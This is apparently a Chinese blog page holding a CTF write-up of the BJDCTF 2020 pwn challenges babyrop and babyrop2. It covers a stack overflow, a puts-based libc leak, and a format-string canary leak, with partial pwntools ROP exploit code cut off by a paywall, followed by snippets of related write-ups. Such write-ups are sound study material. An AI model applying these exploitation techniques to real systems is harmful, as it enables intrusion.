bjdctf_2020_babyrop 与bjdctf_2020_babyrop2(格式化字符leak)

最新推荐文章于 2024-09-01 16:28:39 发布
原创 最新推荐文章于 2024-09-01 16:28:39 发布 · 720 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了BJDCTF 2020中两道题目——bjdctf_2020_babyrop和bjdctf_2020_babyrop2的漏洞利用过程。通过checksec检查安全特性,发现存在栈溢出。在bjdctf_2020_babyrop2中,由于开启canary,需要找到payload长度限制并泄露canary的值。通过%n$p和%p的组合,确定了输入点在栈上的相对位置,并找到了偏移量6,最终使用%7$p泄露canary,为rop链的构造打下基础。

bjdctf_2020_babyrop

先checksec

在这里插入图片描述
打开ida正常查看函数

在这里插入图片描述打开init函数发现puts函数

在这里插入图片描述然后进入vuln函数 存在栈溢出
在这里插入图片描述
没有看到后门函数应该是libc leak+rop
代码如下

from pwn import*
from LibcSearcher import*
p=remote('node3.buuoj.cn',29901)
#p=process('')
elf=ELF('bjdctf_2020_babyrop')
puts_got=elf.got['puts']
puts_plt=elf.plt['puts']
pop_rdi=0x400733
pop_rsi=0x400731
main=0x4006ad
payload='a'*0x28+p64(pop_rdi)+p64(puts_got)+p64(puts_plt)+p64
最低0.47元/天 解锁文章
bjdctf_2020_babyrop2
qq_33010875的博客
09-26 493
环境:WSL2,ubuntu16.04,python2 checksec文件: PIE保护没开,构造rop链 存在Canary,需要找出Canary的值才能进行地址泄露 文件拖入ida: 在gift函数发现printf格式化漏洞,可以利用该漏洞获取Canary的值,但需要找出输入点参数在栈上的相对位置(找偏移量) 由于scanf限制了只能输入6个字符,因此不能用 AAAA %x %x %x....... 来泄露值,改为: aa%6$p #6是一步步试出来的,可以从1开始尝试,p是十六进制形式 结
[CTF]bjdctf_2020_babyrop2
m0_50819561的博客
10-07 621
格式化字符串漏洞+金丝雀绕过。 出现这种形式的,v2就是canary。 查看他在栈里的位置。 var_8就是canary。 利用格式化字符串漏洞。 %6$p表示输出第六个参数。 发现我们输入的东西在第六个参数的位置。 调试之后发现有一串随机的十六进制数字。这就是canary。由此可见,这个canary在第七个参数的位置。 于是我们先用格式话字符串泄露第七个参数位置上的内容,每一次进行栈溢出的时候把泄露出来的值填入即可。 代码如下: from pwn import * from LibcSearche
[BUUOJ]bjdctf_2020_babyrop
Do1phln的博客
10-24 566
先checksec,64位小端序,MX保护开,其它全关,接着进入IDA分析main函数内很简单,进一步分析后找到关键函数vuln本题没有找到backdoor,所以应该是做基地址泄露然后getshell,整个程序内只有puts函数可以输出内容,因此对puts函数进行修改,先溢出后转到此处,考虑到系统会对堆栈进行平衡,所以我们要修改puts的参数需要先进行一次pop保证堆栈平衡,因此使用ROPgadget先找到符合我们条件的ROPputs_got是puts函数的got表项地址,里面装的是puts的真实地址。使用
【CTF】bjdctf_2020_babyrop
凉水的博客
06-18 899
bjdctf_2020_babyrop
bjdctf_2020_babyrop2-fmt-leak canary
个人笔记
04-10 666
这使得参数可以输出多次,使用多个格式说明符,以不同的顺序输出。本地libc下载:https://github.com/Yeuoly/buuctf_pwn/tree/master/bjdctf_2020_babyrop2。printf(“%p”, a) 用地址的格式打印变量 a 的值,printf(“%p”, &a) 打印变量 a 所在的地址。思路:aa相当于定位标识,format在格式化假参数6的位置,所以构造成。2,IDA静态分析,查看可以泄露canary的地方,否则只能爆破了。canary的位置:即。
C_Language_Programming_under_Linux_memory_leak_Res_linux_linux
07-15
Linux下C语言程序内存泄漏的研究,阐述了内存泄漏的概念,危害,和常发场景,并给出查找内存泄漏的方法
Memory_and_Exception_Trace.zip_memory leak_trace
09-24
"Memory leak trace"指的是追踪和定位内存泄漏的过程,这对于优化和维护代码至关重要。 1. **内存管理基础**:在C++中,程序员负责手动管理内存。`new`和`delete`关键字用于动态分配和释放内存。动态分配的内存应在...
Android_memory-leak-debugging.pdf.zip_Android memory le_android_
09-24
2. **内存泄漏类型** - 静态变量:静态变量生命周期应用相同,如果引用的对象不再使用,但静态变量仍然持有其引用,就会导致内存泄漏。 - 单例模式:不恰当的单例实现可能导致长时间保持对对象的引用。 - ...
bjdctf2020 babyrop
pondzhang的专栏
05-09 373
from pwn import * p = process('./bjdctf_2020_babyrop') libcelf = ELF('./libc-2.23.so') pop_rdi_ret = 0x0000000000400733 pop_rsi_r15_ret = 0x0000000000400731 pltputs = 0x00000000004004E0 main = 0x00000000004006AD gotputs = 0x0000000000601018 payload = 'a' *
buuctf bjdctf_2020_babyrop
carol2358的博客
05-02 511
常规libc 64位 from pwn import * from LibcSearcher import * local_file = './bjdctf_2020_babyrop' local_libc = '/lib/x86_64-linux-gnu/libc-2.23.so' remote_libc = './libc-2.23.so' select = 1 if sel...
bjdctf_2020_babyrop
u014377094的博客
01-25 1209
新手向解释
pwn7第七关
qq_18823653的博客
04-03 520
前面几个懒得写了,直接第七个吧,溢出点和前面一样get()函数,112字节,保护只开了NX程序本身没有system(),也没有/bin/sh,且栈不可执行,用ROPgadget也没找到有用的语句,但是程序是动态链接的,运行时会加载so库,可以用put()泄露出put的真实地址,又因为ASLR随机化不了地址底12位,可以用put真实地址的底12位查询加载的那个版本的libc.so,以及确定libc的...
[PWN] BUUCTF bjdctf_2020_babyrop
空城惜梦的博客
06-04 693
构造常规的ROP链,三种找到libc版本的方法分析寻找libc版本1.利用LibcSearcher来查找libc版本payload2.通过特殊网址来查找libc版本3.通过gdb来查找libc版本payload 分析 按照惯例checksce ,发现开了NX和RELRO 运行程序,查看程序的运行逻辑,从图中的红框可以猜测是一道泄露libc的题目 接着用IDA查看程序中主要函数存在的漏洞,可以看到 buf这个字符串数组只有0x20字节,而read却可以读取0x64个字节,所以这里存在着栈溢出 shift
BUUCTF bjdctf_2020_babyrop 1 和 2
BengDouLove的博客
04-09 1764
这两个rop其实是差不多的,第二个比第一个多了一个canary 先看一下第一个 bjdctf_2020_babyrop1 init里面两个puts vul里面一个puts一个read 没有system和binsh ,要泄露libc,但是现在没有可以控制的输出手段,,所以要通过read,,覆盖返回地址为puts,,构造参数让puts输出libc的函数 这是网上别人的做法,,首先到pop rd...
bjdctf_2020_babyrop【BUUCTF】
qq_41696518的博客
08-31 591
bjdctf_2020_babyrop
bjdctf-2020-babyrop2
最新发布
m0_73743784的博客
09-01 834
首先需要注意要获得 canary 的值,然后才能进行接下来的一系列操作格式化字符串漏洞需要大胆地调试才能得到实际的偏移,方便我们利用。
轻量级面向对象C编程框架LW_OOPC详解
同时,了解如何LW_OOPC提供的内存管理机制配合使用,是避免潜在问题的关键。 LW_OOPC为C语言程序员提供了一种轻量级、高效的面向对象编程工具,使得在C语言中实现面向接口编程成为可能。通过合理的配置和宏使用,...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值